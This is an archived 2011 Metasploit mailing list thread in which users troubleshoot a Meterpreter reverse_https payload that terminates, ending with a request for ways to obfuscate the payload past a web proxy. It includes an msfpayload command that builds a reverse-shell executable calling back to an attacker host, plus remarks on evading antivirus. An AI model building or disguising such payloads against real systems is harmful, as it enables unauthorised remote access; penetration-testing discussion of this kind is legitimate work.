metasploit-framework March 2011 archive

Re: [framework] Meterpreter Reverse_HTTPS dies

From: Gerasimos Kassaras <g.kassaras_at_nospam>
Date: Wed Mar 09 2011 - 13:10:31 GMT
To: framework@spool.metasploit.com

I am working on a project with John Mistikopoulos and we are trying to
get past a restrictive web proxy server. Any ideas about obfuscating the
payload?

So far I have tried:

1. Executables and failed (as expected)
2. VBS and failed (This time it failed on desktop)

On 9 March 2011 14:45, John Mistikopoulos <mailtest1223133456@gmail.com> wrote:
> I changed the ip of the listener from 0.0.0.0 to the real IP and worked.
> Thanks everyone for the help!
>
> -- John
>
> On Sat, Mar 5, 2011 at 12:02 AM, Rob Fuller <mubix@room362.com> wrote:
>>
>> try setting LHOST on the listener to the IP of the host instead of
>> 0.0.0.0.
>> This is why I asked for a start to finish script. That way we aren't
>> shooting in the dark guessing what the problem might be.
>> Please copy from the point you make the binary to the point you pasted in
>> the original email, paste it to a paste bin, change your IP info to
>> something like 192.168.0.1 (attacker) and 192.168.0.2 (victim) so we can
>> better assist you.
>>
>> --
>> Rob Fuller | Mubix
>> Certified Checkbox Unchecker
>> Room362.com | Hak5.org
>>
>>
>> On Fri, Mar 4, 2011 at 9:28 AM, John Mistikopoulos
>> <mailtest1223133456@gmail.com> wrote:
>>>
>>> Yeah, reverse_tcp works great.
>>> I have pasted the logs here:
>>> http://mail.metasploit.com/pipermail/framework/2011-February/007516.html
>>> Additionally, I've created the payload with the following command:
>>> msfpayload windows/meterpreter/reverse_https LHOST=x.x.x.x  LPORT=443 X >
>>> /tmp/https.exe
>>> and started a multihandler listening at 0.0.0.0:443.
>>>
>>> On Thu, Mar 3, 2011 at 6:03 PM, Rob Fuller <mubix@room362.com> wrote:
>>>>
>>>> Does a different payload work? reverse_tcp for example. And
>>>> reverse_https doesn't use ActiveX, so you shouldn't be seeing an iexplorer.exe
>>>> running, unless of course that's what you named your payload. It could be
>>>> a problem on your listener end.
>>>> Can you pastebin your process from start to finish? What exploit are you
>>>> running? Is it just a built binary?
>>>>
>>>> --
>>>> Rob Fuller | Mubix
>>>> Certified Checkbox Unchecker
>>>> Room362.com | Hak5.org
>>>>
>>>>
>>>> On Thu, Mar 3, 2011 at 4:00 AM, John Mistikopoulos
>>>> <mailtest1223133456@gmail.com> wrote:
>>>>>
>>>>> I have tried numerous scenarios such as:
>>>>> 1. Middle proxy servers (more than 3 different web proxy software)
>>>>> 2. A single proxy server
>>>>> 3. No proxy server
>>>>> 4. Over the internet and locally (get the same error)
>>>>> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
>>>>> 6. Tested with IE6, unpatched.
>>>>> 7. Tested with different user accounts and group policies.
>>>>> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as
>>>>> a threat)
>>>>> 9. Tested without any AV protection or Firewall-IPS.
>>>>>
>>>>> When I run the payload (for example the "exe" file on an unprotected PC
>>>>> - no AV, no IPS) I see its name in the task manager just for a while and
>>>>> then it dies.
>>>>> However, I don't see any instance of iexplorer.exe running.
>>>>>
>>>>>
>>>>> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm@metasploit.com> wrote:
>>>>>>
>>>>>> On 2/28/2011 6:13 AM, John Mistikopoulos wrote:
>>>>>> > And then, the listener stops giving any other info.
>>>>>> > I went to the victim PC and realized that the payload exe had
>>>>>> > already died.
>>>>>> > I couldn't see it in the task manager.
>>>>>> > Concurrently, I had been running wireshark.
>>>>>> > The two last packets were:
>>>>>> > 1. Victim => Listener (RST, ACK)
>>>>>> > 2. Listener => Victim (FIN, ACK)
>>>>>> >
>>>>>> > Finally I don't get any connections.
>>>>>> > Does anyone know how to fix this?
>>>>>>
>>>>>> Is there any network proxy/filter between the target and yourself? Is
>>>>>> the target running an endpoint protection product or HIPS? Is the
>>>>>> target process a user-process (IE) or a system process (assuming
>>>>>> IE/user-land)?
>>>>>>
>>>>>> The reverse_https payload is finicky based on the WinInet profile of
>>>>>> the user running the code.
>>>>>>
>>>>>> -HD
>>>>>> _______________________________________________
>>>>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>>>
>>>>
>>>
>>
>

--
Regards
Gerasimos Kassaras